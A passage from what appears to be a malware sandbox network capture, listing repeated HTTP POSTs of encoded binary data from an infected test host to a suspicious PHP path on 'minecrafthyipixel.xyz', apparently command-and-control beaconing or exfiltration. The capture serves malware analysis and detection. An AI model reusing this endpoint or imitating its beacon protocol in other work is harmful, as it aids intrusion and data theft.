                                                                                                                                    Apr 19, 2024 13:44:09.087670088 CEST2512OUTData Raw: 52 5d 5b 5b 59 44 54 5e 5c 5e 59 59 57 50 58 5e 54 53 5f 5c 54 5e 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R][[YDT^\^YYWPX^TS_\T^SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_25"73#[';)Q>;X'* V&(-#1-+(?7,8].$[. X
                                                                                                                                    Apr 19, 2024 13:44:09.343632936 CEST615INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:09 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RbK55HKx7EuLcREsEAbuW6lBTYXBBO%2BD05WTUG0EdAeg9vNY1WjtEfx0mCWmsW0eN3AdqU9p7WITxOfRAeoS49HVz8D606RfbhCGeHjWxI4jdO4bw6cyV4WOSKOik9rW0ZnKt1KqR8s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4187f654566-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:09.343700886 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    149192.168.2.449903104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:09.558749914 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:09.663471937 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:09.663620949 CEST2512OUTData Raw: 57 5a 5b 58 5c 44 51 5d 5c 5e 59 59 57 53 58 5d 54 53 5f 59 54 5c 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ[X\DQ]\^YYWSX]TS_YT\SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\1"R5( 'V;Z0(2=8;20T&(57T6V=Z#?$-%$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:10.021815062 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:09 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2FFlXbL3Q4eI2SrVUvGDbNAu%2BHogJZI9VtoszIC%2BAa4rbH6hYbIOC37Y9gFTASJenaD0tdOXTXNQmi8A60lXRly0HWApzBjAdCwuK3GMaoAWZrMLdW%2FRT3NvGntMwemBhJ%2Bk9JiCgnQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca41c18a212f1-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:10.021847010 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    150192.168.2.449904104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:10.247252941 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:10.352298021 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:10.352530003 CEST2512OUTData Raw: 57 5d 5e 55 5c 40 54 5a 5c 5e 59 59 57 53 58 53 54 52 5f 5e 54 59 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W]^U\@TZ\^YYWSXSTR_^TYSZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[2>T" ' '=);%/%+1#1)8'7<89$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:10.726248980 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:10 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FCw3%2F2kWUTmt1I6FLUDdlvbPZs5dRutVHdE0wWqPqIYG46BmlgfN8l4eWF5fM%2Bn8cThSW8Hp8seNe19iPvwJ41jc3ntl1PAPPlxg0mw%2FreWyVtQ2bknJcnLo%2FnKeFTgFTHes8rPwzt8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca420691a458e-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:10.726309061 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    151192.168.2.449905104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:10.951617956 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:11.057091951 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:11.059657097 CEST2512OUTData Raw: 57 5a 5b 58 59 46 54 5f 5c 5e 59 59 57 5f 58 5d 54 54 5f 5e 54 5d 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ[XYFT_\^YYW_X]TT_^T]S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%Z'=*U6,0]$+>\2:$U&8"P 2=/4?3.$[. X
                                                                                                                                    Apr 19, 2024 13:44:11.413799047 CEST627INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:11 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8FMBqMxhTpFbfB2HXFj242jd442YDUzqi7lZJNGLWM%2BWhFLN9u6T%2Bcn3LlkfAGA5aUpF0HgYwzvLDH4y4Sj6hKdUBxmFTaaCP%2FsFc%2BMxYtKpCgwakJ9L0%2FFoVpOsP2R7%2BzOr%2F164b3Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca424cbe112cf-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:11.413853884 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    152192.168.2.449906104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:11.782747984 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:11.888900042 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:11.889077902 CEST2504OUTData Raw: 52 5a 5b 5c 5c 43 51 5f 5c 5e 59 59 57 57 58 5f 54 53 5f 59 54 5e 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ[\\CQ_\^YYWWX_TS_YT^S^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%[2=2W +'$43]-V=+19($864!))\"/8-$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:12.141175985 CEST623INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:12 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bEnTqIfeAhZ7zXcTUZ7CBYD4cDzBQWfMB%2FxkIDATEQxmpCJ3UnuYi6%2BG38weI2537Nl%2FyouTZ3HC8%2FCk6K8wIDdGruGYI6BwXFZJM%2FjChXvIGgXrYtqigpvhoZYeUb8tXOHaXDhois8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca429fcfa53ba-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:12.141271114 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    153192.168.2.449907104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:11.801305056 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:11.906125069 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:11.906224012 CEST2192OUTData Raw: 57 5f 5e 55 5c 40 51 5f 5c 5e 59 59 57 53 58 5f 54 50 5f 5e 54 5a 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_^U\@Q_\^YYWSX_TP_^TZS]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&*6(Z3$$+)Q)&$U&+%712W=]47,.5$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:12.167299986 CEST768INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:12 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kbojBJfCUw5%2FILHotYXm0gFfimOsYHZOtgMh2rMBHPnk93MSFbwV04NqN6uC4CEhMnK%2BJk%2BAGXbNdLV4CgBw8DnGSNxmL53wDxdVYrxY1IV5l4O6aheAWD7hltpY9G6TuVrW7rjZN8I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca42a18c1b0ac-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 5f 30 26 36 16 20 29 3c 02 2b 33 0c 58 29 51 22 04 2a 00 26 02 37 3d 2b 0e 38 04 2b 03 28 3b 39 07 31 0d 0f 57 26 3d 30 56 32 30 21 59 00 1a 39 58 22 3c 25 58 2d 07 2d 58 2b 1f 2e 07 37 1c 3c 07 3f 00 2a 0d 23 16 0e 03 3c 00 25 51 2f 16 2c 56 3c 06 2a 07 38 0e 26 14 36 3b 2c 52 09 12 26 08 3c 16 24 59 25 0e 00 09 34 57 27 01 3f 11 3a 5b 24 15 01 0f 25 55 28 17 3a 0c 0c 56 31 10 0b 1d 3e 14 20 56 23 05 2a 09 31 3e 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$_0&6 )<+3X)Q"*&7=+8+(;91W&=0V20!Y9X"<%X--X+.7<?*#<%Q/,V<*8&6;,R&<$Y%4W'?:[$%U(:V1> V#*1>.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:44:12.167359114 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    154192.168.2.449908104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:13.515711069 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:13.620583057 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:13.620908976 CEST2512OUTData Raw: 57 5a 5e 5a 5c 40 51 59 5c 5e 59 59 57 51 58 53 54 5b 5f 5a 54 5a 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^Z\@QY\^YYWQXST[_ZTZS^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&.>U5+<\$0?'+W=8#&)0W1;" 16U=?_#Z$.$[. X =
                                                                                                                                    Apr 19, 2024 13:44:13.884989023 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:13 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=917bg6y2RHRUs6XWYuLhROBJO%2BUGzVGreGyrH4ODADh%2BM6hDu8BdhghCxTacnHNfAp0gtqhtozfOfwnVOGMV8sq5KjkYZ3D2f1fPeQvQ3IuZfrGUjC5roLbtjeali%2BxAjkvaTf74Fu8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca434cde217ff-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:13.885050058 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    155192.168.2.449909104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:14.111999035 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:14.217005014 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:14.217255116 CEST2512OUTData Raw: 57 5a 5b 5f 59 42 51 59 5c 5e 59 59 57 52 58 5b 54 5a 5f 58 54 54 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ[_YBQY\^YYWRX[TZ_XTTSY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1S5;' 0*=; '*#282W 1.V+8+] :$[. X 1
                                                                                                                                    Apr 19, 2024 13:44:14.488500118 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:14 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ICzuxG2i2gnLVeW4Duc%2B7THKqkal%2FWZOeA%2FQuVYA55yx6ha6DNfrXj9GP3298A8mA8XeSbEd9UwUrQ9pdTBrNTCi0duaGon5rBnL7UdavTEhZvjAayz5GZpElmGkmp2hSEID94wBBcA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4388adfb032-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:14.488563061 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    156192.168.2.449910104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:14.717881918 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:14.823326111 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:14.823451996 CEST2512OUTData Raw: 52 5e 5e 5f 59 41 51 5f 5c 5e 59 59 57 50 58 5a 54 51 5f 59 54 5c 53 57 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^^_YAQ_\^YYWPXZTQ_YT\SW^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'>%!8$+3.>8'_2*#&+=7*4 8:%$[. X
                                                                                                                                    Apr 19, 2024 13:44:15.084517002 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:15 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1h5%2F7L6bGy4UFb3WSI3OqLIHf5Q5Gy5sKsJz1X0hYAWBE0EyOLnEIVQYYcECs37tEBMjBL%2F%2BTkVpiJ6MFuzkZJx%2F6g6UusGvp1arYCZit9dl3fFOYN8SsbKLNMvZMxATQSsBiVMzhaA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca43c5f3b6788-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:15.084584951 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    157192.168.2.449911104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:15.313389063 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:15.418493986 CEST25INHTTP/1.1 100 Continue
